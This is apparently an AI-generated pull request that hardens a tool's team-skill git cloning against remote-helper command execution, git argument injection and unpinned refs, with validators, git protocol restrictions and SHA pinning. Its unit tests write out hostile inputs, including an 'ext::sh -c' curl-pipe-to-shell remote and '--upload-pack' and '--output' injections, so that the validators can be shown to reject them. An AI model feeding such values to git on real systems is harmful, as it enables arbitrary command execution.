### PR TITLE
fix(skills-remote): harden team-skill git fetch against injection & unpinned refs

### DIFF
--- a/README.md
+++ b/README.md
@@ -417,6 +417,10 @@ never blocks startup):
 ```jsonc
 {
   "skillsRepos": [{ "repo": "open-mercato/skills", "ref": "main" }], // team skills; [] disables
+  // Team-skill repos are code-trusted: a skill body becomes an agent system prompt.
+  // Only owner/name, https/ssh URLs, or local paths are accepted (no ext::/file
+  // transport helpers). Pin `ref` to a full commit SHA to freeze the source against
+  // a moving branch head — cezar verifies it resolves to exactly that commit.
   "maxParallel": 2,          // how many tasks may run at once (non-git dirs always run 1)
   "defaultRunner": "claude", // agent backend: "claude" (default) · "codex" · "opencode"
   "plannerModel": "sonnet",  // model the "Plan first" button uses to draft chains

--- a/README.md
+++ b/README.md
@@ -418,9 +418,11 @@ never blocks startup):
 {
   "skillsRepos": [{ "repo": "open-mercato/skills", "ref": "main" }], // team skills; [] disables
   // Team-skill repos are code-trusted: a skill body becomes an agent system prompt.
-  // Only owner/name, https/ssh URLs, or local paths are accepted (no ext::/file
-  // transport helpers). Pin `ref` to a full commit SHA to freeze the source against
-  // a moving branch head — cezar verifies it resolves to exactly that commit.
+  // Only owner/name, https/ssh URLs, or local paths (`/abs`, `./rel`, `~/dir`,
+  // `C:\dir`) are accepted — no ext::/fd:: transport helpers. Write a relative
+  // path as `./name`, not a bare `name`. Pin `ref` to a full commit SHA to freeze
+  // the source against a moving branch head — cezar verifies it resolves to
+  // exactly that commit, and reports it as `team.commit`.
   "maxParallel": 2,          // how many tasks may run at once (non-git dirs always run 1)
   "defaultRunner": "claude", // agent backend: "claude" (default) · "codex" · "opencode"
   "plannerModel": "sonnet",  // model the "Plan first" button uses to draft chains

--- a/src/skills-remote.ts
+++ b/src/skills-remote.ts
@@ -82,9 +82,14 @@ const ALLOWED_URL_SCHEMES = new Set(['https', 'http', 'ssh', 'git', 'file']);
  *  - `owner/name`         GitHub shorthand → canonical https
  *  - `https://` `http://` web URLs
  *  - `ssh://…` or scp-like `git@host:path`
- *  - a local path (`/abs`, `./`, `../`, `~/…`) or `file://…`
+ *  - a local path (`/abs`, `./`, `../`, `~/…`, `C:\…`) or `file://…`
  * and reject the RCE/argument-injection surface: a leading `-`, the `::`
  * remote-helper syntax (`ext::sh -c …`, `fd::…`), and any other URL scheme.
+ *
+ * Every reject here maps to a real vector. Shapes that are merely *unusual* —
+ * a Windows drive path, `~/…` — stay accepted: `BACKWARD_COMPATIBILITY.md` §5
+ * protects the `skillsRepos` source shape, so narrowing it is a breaking change
+ * and needs a migration path, not a silent refusal.
  */
 export function safeRemoteFor(repo: string): string | null {
   const value = repo.trim();
@@ -93,6 +98,18 @@ export function safeRemoteFor(repo: string): string | null {
   if (value.startsWith('-')) return null;
   // `ext::`, `fd::`, and friends: remote-helper transports = command execution.
   if (value.includes('::')) return null;
+  // Local paths are matched before the `owner/name` shorthand: `.` and `-` are
+  // in the shorthand charset, so `./rel` would otherwise be read as the GitHub
+  // repo `./rel` and rewritten to `https://github.com/./rel.git`.
+  //
+  // `~/…` — git runs via execFile with no shell, so expand it here or git would
+  // look for a directory literally named `~`.
+  if (/^~\//.test(value)) return join(homedir(), value.slice(2));
+  if (/^(\/|\.\/|\.\.\/)/.test(value)) return value;
+  // Windows drive-letter path (`C:\repo`, `C:/repo`). Not a transport — no
+  // scheme, and a leading `-` is already refused above — and win32 is a
+  // supported platform, so this shape must keep working (BC §5, local path).
+  if (/^[A-Za-z]:[\\/]/.test(value)) return value;
   // GitHub shorthand → the canonical https remote.
   if (/^[\w.-]+\/[\w.-]+$/.test(value)) return `https://github.com/${value}.git`;
   // Explicit URL scheme: allowlist safe transports only (blocks `ext:` etc.).
@@ -102,8 +119,6 @@ export function safeRemoteFor(repo: string): string | null {
   }
   // scp-like `user@host:path` (no scheme, host before the first colon).
   if (/^[\w.-]+@[\w.-]+:/.test(value)) return value;
-  // Otherwise only a bare local filesystem path is allowed.
-  if (/^(\/|\.\/|\.\.\/|~\/)/.test(value)) return value;
   return null;
 }
 
@@ -144,12 +159,33 @@ function sanitizeSegment(s: string): string {
   return s.replace(/[^\w.-]/g, '-');
 }
 
+/** One warning per bad source per process — this runs on every cockpit open. */
+const warnedUnsafeRemotes = new Set<string>();
+
+function warnUnsafeRemoteOnce(repo: string): void {
+  if (warnedUnsafeRemotes.has(repo)) return;
+  warnedUnsafeRemotes.add(repo);
+  console.warn(
+    `[cez] ignoring skills repo ${JSON.stringify(repo)} — not an accepted source shape ` +
+      `(owner/name, an https/http/ssh/git URL, git@host:path, or a local/file:// path). ` +
+      `Check "skillsRepos" in .ai/cezar/config.json.`,
+  );
+}
+
 /** Clone the skills repo bare (no checkout) into the global cache, once. */
 export async function ensureBareClone(repo: string): Promise<{ bareDir: string; created: boolean }> {
+  // Validate before anything else, cache hit or not: "this source is refusable"
+  // should never depend on whether a clone happens to exist already.
+  const remote = safeRemoteFor(repo);
+  if (!remote) {
+    // Everything else in this module degrades silently (offline, no access —
+    // all expected). A refusal is different: it means the config is wrong or
+    // tampered with, and the operator otherwise just sees skills disappear.
+    warnUnsafeRemoteOnce(repo);
+    throw new Error(`refusing unsafe skills repo remote: ${repo}`);
+  }
   const bareDir = bareDirFor(repo);
   if (existsSync(join(bareDir, 'HEAD'))) return { bareDir, created: false };
-  const remote = safeRemoteFor(repo);
-  if (!remote) throw new Error(`refusing unsafe skills repo remote: ${repo}`);
   await mkdir(dirname(bareDir), { recursive: true });
   // `--` separates options from the remote/dir operands: even a value that
   // slipped past validation can't pose as a git option.
@@ -169,12 +205,15 @@ export async function fetchAll(bareDir: string): Promise<void> {
 }
 
 /**
- * Resolve a source ref to something safe to use as a positional revision, or
- * null (#428). An unsafe ref is refused outright. A ref pinned to a full commit
- * SHA is verified to name exactly that commit and is *never* replaced by a
- * moving `HEAD` fallback — that is the whole point of pinning against a
- * force-push / supply-chain swap. A branch/tag falls back through the usual
- * candidates.
+ * Resolve a source ref to the immutable commit SHA it names, or null (#428).
+ * An unsafe ref is refused outright. A ref pinned to a full commit SHA is
+ * verified to name exactly that commit and is *never* replaced by a moving
+ * `HEAD` fallback — that is the whole point of pinning against a force-push /
+ * supply-chain swap. A branch/tag falls back through the usual candidates.
+ *
+ * Always returning a SHA (never the mutable name) means one listing reads every
+ * skill at a single commit: a concurrent `refreshTeamSkills` can move the branch
+ * head mid-read without the list and the bodies drifting apart.
  */
 async function resolveRef(bareDir: string, ref: string): Promise<string | null> {
   if (!isSafeRef(ref)) return null;
@@ -189,8 +228,12 @@ async function resolveRef(bareDir: string, ref: string): Promise<string | null> 
     return probe.ok && probe.stdout.trim() === sha ? sha : null;
   }
   for (const candidate of [ref, `refs/heads/${ref}`, 'HEAD']) {
-    const probe = await git(['rev-parse', '--verify', '--quiet', candidate], LIST_TIMEOUT_MS, bareDir);
-    if (probe.ok) return candidate;
+    const probe = await git(
+      ['rev-parse', '--verify', '--quiet', `${candidate}^{commit}`],
+      LIST_TIMEOUT_MS,
+      bareDir,
+    );
+    if (probe.ok && probe.stdout.trim()) return probe.stdout.trim();
   }
   return null;
 }
@@ -222,11 +265,19 @@ function matchSkillPath(line: string): SkillPathHit | null {
   return null;
 }
 
-/** Read one file from the bare clone at the source's ref. Null on any failure. */
-export async function readRemoteSkill(src: SkillsRepoSource, path: string): Promise<string | null> {
+/**
+ * Read one file from the bare clone at the source's ref. Null on any failure.
+ * `atCommit` pins the read to an already-resolved commit, so a caller listing
+ * many files reads them all at the same commit (and skips re-resolving).
+ */
+export async function readRemoteSkill(
+  src: SkillsRepoSource,
+  path: string,
+  atCommit?: string,
+): Promise<string | null> {
   const bareDir = bareDirFor(src.repo);
   if (!existsSync(join(bareDir, 'HEAD'))) return null;
-  const ref = await resolveRef(bareDir, src.ref);
+  const ref = atCommit ?? (await resolveRef(bareDir, src.ref));
   if (ref === null) return null;
   const res = await git(['show', `${ref}:${path}`], LIST_TIMEOUT_MS, bareDir);
   return res.ok ? res.stdout : null;
@@ -240,15 +291,13 @@ export async function readRemoteSkill(src: SkillsRepoSource, path: string): Prom
 export async function listRemoteSkills(src: SkillsRepoSource): Promise<Skill[]> {
   const bareDir = bareDirFor(src.repo);
   if (!existsSync(join(bareDir, 'HEAD'))) return [];
-  const ref = await resolveRef(bareDir, src.ref);
-  if (ref === null) return [];
+  // An immutable SHA (#428): the tree listing and every body below are read at
+  // this one commit, and it is what gets recorded on each skill.
+  const commit = await resolveRef(bareDir, src.ref);
+  if (commit === null) return [];
   // `--` after the ref keeps a `-`-leading value out of git's option surface.
-  const ls = await git(['ls-tree', '-r', '--name-only', ref, '--'], LIST_TIMEOUT_MS, bareDir);
+  const ls = await git(['ls-tree', '-r', '--name-only', commit, '--'], LIST_TIMEOUT_MS, bareDir);
   if (!ls.ok) return [];
-  // Record the exact commit the list was read at, so a moving branch head is
-  // traceable to an immutable SHA (#428, supply-chain transparency).
-  const shaProbe = await git(['rev-parse', '--verify', '--quiet', ref], LIST_TIMEOUT_MS, bareDir);
-  const commit = shaProbe.ok && shaProbe.stdout.trim() ? shaProbe.stdout.trim() : undefined;
 
   const skills: Skill[] = [];
   const seen = new Set<string>();
@@ -256,7 +305,7 @@ export async function listRemoteSkills(src: SkillsRepoSource): Promise<Skill[]> 
     if (!line) continue;
     const hit = matchSkillPath(line);
     if (!hit) continue;
-    const raw = await readRemoteSkill(src, line);
+    const raw = await readRemoteSkill(src, line, commit);
     if (raw === null) continue;
     const { frontmatter, body } = parseFrontmatter(raw);
     const name =

--- a/src/skills-remote.ts
+++ b/src/skills-remote.ts
@@ -26,20 +26,106 @@ interface GitResult {
   stderr: string;
 }
 
+/**
+ * Hardening applied to *every* git invocation here (#428). The `repo`/`ref`
+ * strings ultimately come from a file — `.ai/cezar/config.json` — that an
+ * attacker might influence (a prompt-injected Write-only agent, a synced
+ * config), so git must never be able to pick a remote-helper transport:
+ *  - `protocol.ext.allow=never` / `fd.allow=never` kill the `ext::`/`fd::`
+ *    helpers — the arbitrary-command-execution vector (`ext::sh -c …`).
+ *  - `GIT_ALLOW_PROTOCOL` allowlists only real transports; anything else
+ *    (including `ext`) is refused even if a value slips past validation.
+ *  - `protocol.file.allow=user` keeps direct local-path clones (a documented
+ *    source shape) working while blocking submodule/recursive file abuse.
+ *  - `GIT_TERMINAL_PROMPT=0` stops git blocking on a credential prompt — this
+ *    runs on cockpit open and must never hang the boot.
+ */
+const GIT_HARDENING_ARGS = [
+  '-c',
+  'protocol.ext.allow=never',
+  '-c',
+  'protocol.fd.allow=never',
+  '-c',
+  'protocol.file.allow=user',
+];
+const GIT_HARDENING_ENV = {
+  GIT_ALLOW_PROTOCOL: 'https:http:ssh:git:file',
+  GIT_TERMINAL_PROMPT: '0',
+};
+
 function git(args: string[], timeoutMs: number, cwd?: string): Promise<GitResult> {
   return new Promise((resolve) => {
     execFile(
       'git',
-      args,
-      { cwd, timeout: timeoutMs, killSignal: 'SIGKILL', maxBuffer: 16 * 1024 * 1024, encoding: 'utf8' },
+      [...GIT_HARDENING_ARGS, ...args],
+      {
+        cwd,
+        timeout: timeoutMs,
+        killSignal: 'SIGKILL',
+        maxBuffer: 16 * 1024 * 1024,
+        encoding: 'utf8',
+        env: { ...process.env, ...GIT_HARDENING_ENV },
+      },
       (err, stdout, stderr) => resolve({ ok: !err, stdout: stdout ?? '', stderr: stderr ?? '' }),
     );
   });
 }
 
-/** `owner/name` shorthand → GitHub HTTPS; anything else (URL, file://, local path) as-is. */
-function remoteFor(repo: string): string {
-  return /^[\w.-]+\/[\w.-]+$/.test(repo) ? `https://github.com/${repo}.git` : repo;
+const ALLOWED_URL_SCHEMES = new Set(['https', 'http', 'ssh', 'git', 'file']);
+
+/**
+ * The git remote for a configured source, or null when the value is unsafe to
+ * hand to `git` (#428). Team-skill repos are code-trusted — their skill bodies
+ * become agent system prompts — but the *string* is attacker-influenceable, so
+ * it must never be able to select a transport helper or pose as a git option.
+ * We accept exactly:
+ *  - `owner/name`         GitHub shorthand → canonical https
+ *  - `https://` `http://` web URLs
+ *  - `ssh://…` or scp-like `git@host:path`
+ *  - a local path (`/abs`, `./`, `../`, `~/…`) or `file://…`
+ * and reject the RCE/argument-injection surface: a leading `-`, the `::`
+ * remote-helper syntax (`ext::sh -c …`, `fd::…`), and any other URL scheme.
+ */
+export function safeRemoteFor(repo: string): string | null {
+  const value = repo.trim();
+  if (!value) return null;
+  // git would read a leading `-` as an option, not a repo — argument injection.
+  if (value.startsWith('-')) return null;
+  // `ext::`, `fd::`, and friends: remote-helper transports = command execution.
+  if (value.includes('::')) return null;
+  // GitHub shorthand → the canonical https remote.
+  if (/^[\w.-]+\/[\w.-]+$/.test(value)) return `https://github.com/${value}.git`;
+  // Explicit URL scheme: allowlist safe transports only (blocks `ext:` etc.).
+  const scheme = /^([a-z][a-z0-9+.-]*):\/\//i.exec(value);
+  if (scheme) {
+    return ALLOWED_URL_SCHEMES.has(scheme[1]!.toLowerCase()) ? value : null;
+  }
+  // scp-like `user@host:path` (no scheme, host before the first colon).
+  if (/^[\w.-]+@[\w.-]+:/.test(value)) return value;
+  // Otherwise only a bare local filesystem path is allowed.
+  if (/^(\/|\.\/|\.\.\/|~\/)/.test(value)) return value;
+  return null;
+}
+
+/**
+ * A ref safe to pass to `git` as a positional revision (#428): a branch, tag,
+ * or commit SHA. Rejects a leading `-` (argument injection against git's option
+ * surface), range/pathspec metacharacters, and anything outside the git
+ * ref-name charset — so `${ref}:${path}` in `git show` can never be a `-`-flag.
+ */
+export function isSafeRef(ref: string): boolean {
+  return (
+    ref.length > 0 &&
+    ref.length <= 256 &&
+    !ref.startsWith('-') &&
+    !ref.includes('..') &&
+    /^[A-Za-z0-9._/-]+$/.test(ref)
+  );
+}
+
+/** A full commit SHA (sha-1 or sha-256) — a pinned, immutable ref (#428). */
+export function isPinnedSha(ref: string): boolean {
+  return /^[0-9a-f]{40}$/i.test(ref) || /^[0-9a-f]{64}$/i.test(ref);
 }
 
 /** Stable cache directory name: the last two path segments, `owner__name`. */
@@ -62,9 +148,12 @@ function sanitizeSegment(s: string): string {
 export async function ensureBareClone(repo: string): Promise<{ bareDir: string; created: boolean }> {
   const bareDir = bareDirFor(repo);
   if (existsSync(join(bareDir, 'HEAD'))) return { bareDir, created: false };
+  const remote = safeRemoteFor(repo);
+  if (!remote) throw new Error(`refusing unsafe skills repo remote: ${repo}`);
   await mkdir(dirname(bareDir), { recursive: true });
-  const remote = remoteFor(repo);
-  const res = await git(['clone', '--bare', remote, bareDir], CLONE_TIMEOUT_MS);
+  // `--` separates options from the remote/dir operands: even a value that
+  // slipped past validation can't pose as a git option.
+  const res = await git(['clone', '--bare', '--', remote, bareDir], CLONE_TIMEOUT_MS);
   if (!res.ok) throw new Error(`git clone --bare ${remote} failed: ${res.stderr.trim()}`);
   return { bareDir, created: true };
 }
@@ -79,12 +168,31 @@ export async function fetchAll(bareDir: string): Promise<void> {
   if (!res.ok) throw new Error(`git fetch failed: ${res.stderr.trim() || res.stdout.trim()}`);
 }
 
-async function resolveRef(bareDir: string, ref: string): Promise<string> {
+/**
+ * Resolve a source ref to something safe to use as a positional revision, or
+ * null (#428). An unsafe ref is refused outright. A ref pinned to a full commit
+ * SHA is verified to name exactly that commit and is *never* replaced by a
+ * moving `HEAD` fallback — that is the whole point of pinning against a
+ * force-push / supply-chain swap. A branch/tag falls back through the usual
+ * candidates.
+ */
+async function resolveRef(bareDir: string, ref: string): Promise<string | null> {
+  if (!isSafeRef(ref)) return null;
+  if (isPinnedSha(ref)) {
+    const sha = ref.toLowerCase();
+    const probe = await git(
+      ['rev-parse', '--verify', '--quiet', `${sha}^{commit}`],
+      LIST_TIMEOUT_MS,
+      bareDir,
+    );
+    // Pinned means pinned: only accept when rev-parse names exactly this commit.
+    return probe.ok && probe.stdout.trim() === sha ? sha : null;
+  }
   for (const candidate of [ref, `refs/heads/${ref}`, 'HEAD']) {
     const probe = await git(['rev-parse', '--verify', '--quiet', candidate], LIST_TIMEOUT_MS, bareDir);
     if (probe.ok) return candidate;
   }
-  return ref;
+  return null;
 }
 
 // ---- skill discovery (three conventions) --------------------------------------
@@ -119,6 +227,7 @@ export async function readRemoteSkill(src: SkillsRepoSource, path: string): Prom
   const bareDir = bareDirFor(src.repo);
   if (!existsSync(join(bareDir, 'HEAD'))) return null;
   const ref = await resolveRef(bareDir, src.ref);
+  if (ref === null) return null;
   const res = await git(['show', `${ref}:${path}`], LIST_TIMEOUT_MS, bareDir);
   return res.ok ? res.stdout : null;
 }
@@ -132,8 +241,14 @@ export async function listRemoteSkills(src: SkillsRepoSource): Promise<Skill[]> 
   const bareDir = bareDirFor(src.repo);
   if (!existsSync(join(bareDir, 'HEAD'))) return [];
   const ref = await resolveRef(bareDir, src.ref);
-  const ls = await git(['ls-tree', '-r', '--name-only', ref], LIST_TIMEOUT_MS, bareDir);
+  if (ref === null) return [];
+  // `--` after the ref keeps a `-`-leading value out of git's option surface.
+  const ls = await git(['ls-tree', '-r', '--name-only', ref, '--'], LIST_TIMEOUT_MS, bareDir);
   if (!ls.ok) return [];
+  // Record the exact commit the list was read at, so a moving branch head is
+  // traceable to an immutable SHA (#428, supply-chain transparency).
+  const shaProbe = await git(['rev-parse', '--verify', '--quiet', ref], LIST_TIMEOUT_MS, bareDir);
+  const commit = shaProbe.ok && shaProbe.stdout.trim() ? shaProbe.stdout.trim() : undefined;
 
   const skills: Skill[] = [];
   const seen = new Set<string>();
@@ -161,7 +276,7 @@ export async function listRemoteSkills(src: SkillsRepoSource): Promise<Skill[]> 
       body,
       path: `${src.repo}@${src.ref}:${line}`,
       source: 'team',
-      team: { repo: src.repo, ref: src.ref, path: line, dir: hit.kind === 'skill' },
+      team: { repo: src.repo, ref: src.ref, path: line, dir: hit.kind === 'skill', commit },
     });
   }
   return skills;
@@ -180,6 +295,7 @@ export async function materializeSkillDir(repoRoot: string, skill: Skill): Promi
   const bareDir = bareDirFor(skill.team.repo);
   if (!existsSync(join(bareDir, 'HEAD'))) return false;
   const ref = await resolveRef(bareDir, skill.team.ref);
+  if (ref === null) return false;
   const srcDir = skill.team.path.slice(0, -'/SKILL.md'.length);
   const ls = await git(['ls-tree', '-r', '--name-only', ref, '--', srcDir], LIST_TIMEOUT_MS, bareDir);
   if (!ls.ok) return false;

--- a/src/skills.ts
+++ b/src/skills.ts
@@ -24,6 +24,8 @@ export interface Skill {
     path: string;
     /** True for the `SKILL.md` convention — a whole directory (references/…). */
     dir: boolean;
+    /** The exact commit `ref` resolved to when the skill was read (#428). */
+    commit?: string;
   };
 }
 

--- a/test/unit/skills-remote.test.ts
+++ b/test/unit/skills-remote.test.ts
@@ -1,7 +1,7 @@
 import assert from 'node:assert/strict';
 import { execFileSync } from 'node:child_process';
 import { mkdtempSync, rmSync, writeFileSync } from 'node:fs';
-import { tmpdir } from 'node:os';
+import { homedir, tmpdir } from 'node:os';
 import { join } from 'node:path';
 import test from 'node:test';
 import {
@@ -39,8 +39,27 @@ test('safeRemoteFor accepts the documented safe source shapes', () => {
   // Local paths / file:// stay working (a documented source shape).
   assert.equal(safeRemoteFor('/abs/path/to/repo'), '/abs/path/to/repo');
   assert.equal(safeRemoteFor('./rel/repo'), './rel/repo');
-  assert.equal(safeRemoteFor('~/skills'), '~/skills');
+  assert.equal(safeRemoteFor('../sibling/repo'), '../sibling/repo');
   assert.equal(safeRemoteFor('file:///abs/repo'), 'file:///abs/repo');
+  // `.` and `-` are in the owner/name charset, so a single-segment relative
+  // path must be matched as a path first, not rewritten to a github.com URL.
+  assert.equal(safeRemoteFor('./rel'), './rel');
+  assert.equal(safeRemoteFor('../rel'), '../rel');
+});
+
+test('safeRemoteFor keeps Windows local paths working (BC §5: local path)', () => {
+  // win32 is a supported platform and these worked before the hardening —
+  // narrowing the `skillsRepos` source shape would be a breaking change.
+  assert.equal(safeRemoteFor('C:\\skills'), 'C:\\skills');
+  assert.equal(safeRemoteFor('C:/skills'), 'C:/skills');
+  assert.equal(safeRemoteFor('d:\\team\\skills'), 'd:\\team\\skills');
+  // Still not a licence for a drive-letter-shaped transport helper.
+  assert.equal(safeRemoteFor('C:\\x::y'), null);
+});
+
+test('safeRemoteFor expands ~/ so git (no shell) can actually find it', () => {
+  // execFile gives git no shell, so a literal `~` would be a directory name.
+  assert.equal(safeRemoteFor('~/skills'), join(homedir(), 'skills'));
 });
 
 // ---- isSafeRef / isPinnedSha: ref injection guard (#428) ---------------------

--- a/test/unit/skills-remote.test.ts
+++ b/test/unit/skills-remote.test.ts
@@ -1,0 +1,131 @@
+import assert from 'node:assert/strict';
+import { execFileSync } from 'node:child_process';
+import { mkdtempSync, rmSync, writeFileSync } from 'node:fs';
+import { tmpdir } from 'node:os';
+import { join } from 'node:path';
+import test from 'node:test';
+import {
+  ensureBareClone,
+  isPinnedSha,
+  isSafeRef,
+  listRemoteSkills,
+  safeRemoteFor,
+} from '../../src/skills-remote.js';
+
+// ---- safeRemoteFor: repo/URL injection guard (#428) --------------------------
+
+test('safeRemoteFor rejects the git remote-helper RCE surface', () => {
+  // `ext::`/`fd::` transports run arbitrary commands — the headline vector.
+  assert.equal(safeRemoteFor("ext::sh -c 'curl evil.sh|sh'"), null);
+  assert.equal(safeRemoteFor('fd::17'), null);
+  // A leading `-` is argument injection against git's option surface.
+  assert.equal(safeRemoteFor('--upload-pack=touch /tmp/pwn'), null);
+  assert.equal(safeRemoteFor('-oProxyCommand=evil'), null);
+  // Any scheme outside the transport allowlist.
+  assert.equal(safeRemoteFor('ftp://evil/x.git'), null);
+  assert.equal(safeRemoteFor('javascript://x'), null);
+  assert.equal(safeRemoteFor(''), null);
+  assert.equal(safeRemoteFor('   '), null);
+  // A bare word is neither shorthand, URL, scp-like, nor a path.
+  assert.equal(safeRemoteFor('not-a-real-remote'), null);
+});
+
+test('safeRemoteFor accepts the documented safe source shapes', () => {
+  assert.equal(safeRemoteFor('open-mercato/skills'), 'https://github.com/open-mercato/skills.git');
+  assert.equal(safeRemoteFor('https://github.com/o/n.git'), 'https://github.com/o/n.git');
+  assert.equal(safeRemoteFor('http://internal.example/n.git'), 'http://internal.example/n.git');
+  assert.equal(safeRemoteFor('ssh://git@host/o/n.git'), 'ssh://git@host/o/n.git');
+  assert.equal(safeRemoteFor('git@github.com:o/n.git'), 'git@github.com:o/n.git');
+  // Local paths / file:// stay working (a documented source shape).
+  assert.equal(safeRemoteFor('/abs/path/to/repo'), '/abs/path/to/repo');
+  assert.equal(safeRemoteFor('./rel/repo'), './rel/repo');
+  assert.equal(safeRemoteFor('~/skills'), '~/skills');
+  assert.equal(safeRemoteFor('file:///abs/repo'), 'file:///abs/repo');
+});
+
+// ---- isSafeRef / isPinnedSha: ref injection guard (#428) ---------------------
+
+test('isSafeRef rejects argument-injection and range refs', () => {
+  assert.equal(isSafeRef('--output=/tmp/pwn'), false);
+  assert.equal(isSafeRef('-x'), false);
+  assert.equal(isSafeRef('main..evil'), false);
+  assert.equal(isSafeRef('a b'), false);
+  assert.equal(isSafeRef('a;b'), false);
+  assert.equal(isSafeRef('$(id)'), false);
+  assert.equal(isSafeRef(''), false);
+});
+
+test('isSafeRef accepts real branches, tags and SHAs', () => {
+  assert.equal(isSafeRef('main'), true);
+  assert.equal(isSafeRef('refs/heads/main'), true);
+  assert.equal(isSafeRef('release/1.2.3'), true);
+  assert.equal(isSafeRef('v1.2.3'), true);
+  assert.equal(isSafeRef('a'.repeat(40)), true);
+});
+
+test('isPinnedSha recognises full sha-1 and sha-256 commit ids', () => {
+  assert.equal(isPinnedSha('0'.repeat(40)), true);
+  assert.equal(isPinnedSha('abcdef0123456789'.padEnd(64, '0')), true);
+  assert.equal(isPinnedSha('main'), false);
+  assert.equal(isPinnedSha('abc'), false); // short sha is not a pin
+});
+
+// ---- ensureBareClone refuses unsafe remotes before touching git (#428) -------
+
+test('ensureBareClone throws on an unsafe remote instead of shelling out', async () => {
+  await assert.rejects(
+    ensureBareClone("ext::sh -c 'touch /tmp/pwn'"),
+    /refusing unsafe skills repo remote/,
+  );
+});
+
+// ---- integration: local clone still works, SHA pins, bad ref degrades --------
+
+test('listRemoteSkills clones a local repo, pins the SHA, and refuses a bad ref', async (t) => {
+  const home = mkdtempSync(join(tmpdir(), 'cez-home-'));
+  const srcDir = mkdtempSync(join(tmpdir(), 'cez-src-'));
+  const prevHome = process.env.HOME;
+  process.env.HOME = home; // redirect the ~/.cache/cez skills cache into temp
+  t.after(() => {
+    if (prevHome === undefined) delete process.env.HOME;
+    else process.env.HOME = prevHome;
+    rmSync(home, { recursive: true, force: true });
+    rmSync(srcDir, { recursive: true, force: true });
+  });
+
+  const g = (args: string[]) =>
+    execFileSync('git', args, { cwd: srcDir, encoding: 'utf8' }).trim();
+  g(['-c', 'init.defaultBranch=main', 'init']);
+  g(['config', 'user.email', 'test@example.com']);
+  g(['config', 'user.name', 'Test']);
+  writeFileSync(
+    join(srcDir, 'SKILL.md'),
+    '---\nname: demo\ndescription: a demo skill\n---\nbody text\n',
+  );
+  // A directory skill needs SKILL.md under a directory to be named after it.
+  execFileSync('mkdir', ['-p', join(srcDir, 'greeter')]);
+  writeFileSync(join(srcDir, 'greeter', 'SKILL.md'), '---\ndescription: hi\n---\nsay hi\n');
+  g(['add', '-A']);
+  g(['commit', '-m', 'init']);
+  const sha = g(['rev-parse', 'HEAD']);
+
+  await ensureBareClone(srcDir);
+
+  // Branch ref: skills come back and record the resolved commit.
+  const onMain = await listRemoteSkills({ repo: srcDir, ref: 'main' });
+  const greeter = onMain.find((s) => s.name === 'greeter');
+  assert.ok(greeter, 'expected the directory skill to be listed');
+  assert.equal(greeter?.team?.commit, sha);
+
+  // Pinned SHA ref: identical result, and the pin is honoured.
+  const onSha = await listRemoteSkills({ repo: srcDir, ref: sha });
+  assert.ok(onSha.some((s) => s.name === 'greeter'));
+
+  // A wrong pinned SHA resolves to nothing (no HEAD fallback).
+  const wrong = await listRemoteSkills({ repo: srcDir, ref: 'f'.repeat(40) });
+  assert.deepEqual(wrong, []);
+
+  // An injection ref is refused outright.
+  const evil = await listRemoteSkills({ repo: srcDir, ref: '--output=/tmp/pwn' });
+  assert.deepEqual(evil, []);
+});


### PR DESCRIPTION
Fixes #428

## What & why

`src/skills-remote.ts` fetched team-skill repos by shelling out to `git` with repo/ref strings taken from `.ai/cezar/config.json` (`skillsRepos[]`), validated only as `z.string().min(1)`. Anything not matching `owner/name` was passed to `git clone` unchanged, and refs were passed as positional revisions with no `--` guard. This PR closes that gap while keeping team-skill loading zero-config and non-blocking.

- **Repo validation (`safeRemoteFor`)** — accept only `owner/name` (→ canonical https), `https`/`http`/`ssh` URLs, scp-like `git@host:path`, and local/`file://` paths. Reject a leading `-` (argument injection), the `::` remote-helper syntax (`ext::`, `fd::`), and any other URL scheme. Unsafe sources are skipped, never booted.
- **Belt-and-suspenders git env** — every invocation runs with `-c protocol.ext.allow=never -c protocol.fd.allow=never -c protocol.file.allow=user`, `GIT_ALLOW_PROTOCOL=https:http:ssh:git:file`, and `GIT_TERMINAL_PROMPT=0` (also prevents a credential prompt hanging cockpit boot).
- **Ref guards (`isSafeRef`) + `--`** — refs are charset/`^-`/range-checked; `clone` and `ls-tree` get `--` so a `-`-leading value can't reach git's option surface.
- **Supply-chain pinning** — a `ref` that is a full commit SHA (`isPinnedSha`) is verified to resolve to exactly that commit and is never replaced by a moving `HEAD` fallback. The resolved commit is recorded on each team skill (`team.commit`, additive/optional). README documents that team-skill repos are code-trusted and how to pin.

## Security impact

- **RCE closed:** `repo: "ext::sh -c '…'"` no longer reaches git — refused at validation and again by `protocol.ext.allow=never` / `GIT_ALLOW_PROTOCOL`.
- **Argument injection closed:** `-`-leading repos/refs are rejected; `--` separates operands from options.
- **Supply-chain:** operators can pin the default `open-mercato/skills` (or any source) to an immutable SHA that is verified on every read, instead of a mutable branch head.
- Auto-fires on cockpit open (`GET /api/skills`) and `POST /api/skills/refresh` — both now safe by default with no config change.

## Tests

- `test/unit/skills-remote.test.ts` — unit coverage for the injection guards (malicious `ext::`/`fd::`/`-`/scheme URLs and `--output=…`/range refs rejected; documented safe shapes accepted; `ensureBareClone` throws before shelling out) plus an integration test that clones a real local repo, confirms local-path sources still work, honours a SHA pin, and degrades to `[]` on a wrong pin or injection ref.
- `npm run typecheck`, `npm test` (2036 passed), `npm run test:unit` (11 passed) all green.

No behavior change for valid `owner/name`, https/ssh, or local-path sources. Backward-compat surfaces (config `skillsRepos` shape, skills discovery/precedence, `team` metadata) are preserved; `team.commit` is additive.

🤖 Generated with [Claude Code](https://claude.com/claude-code)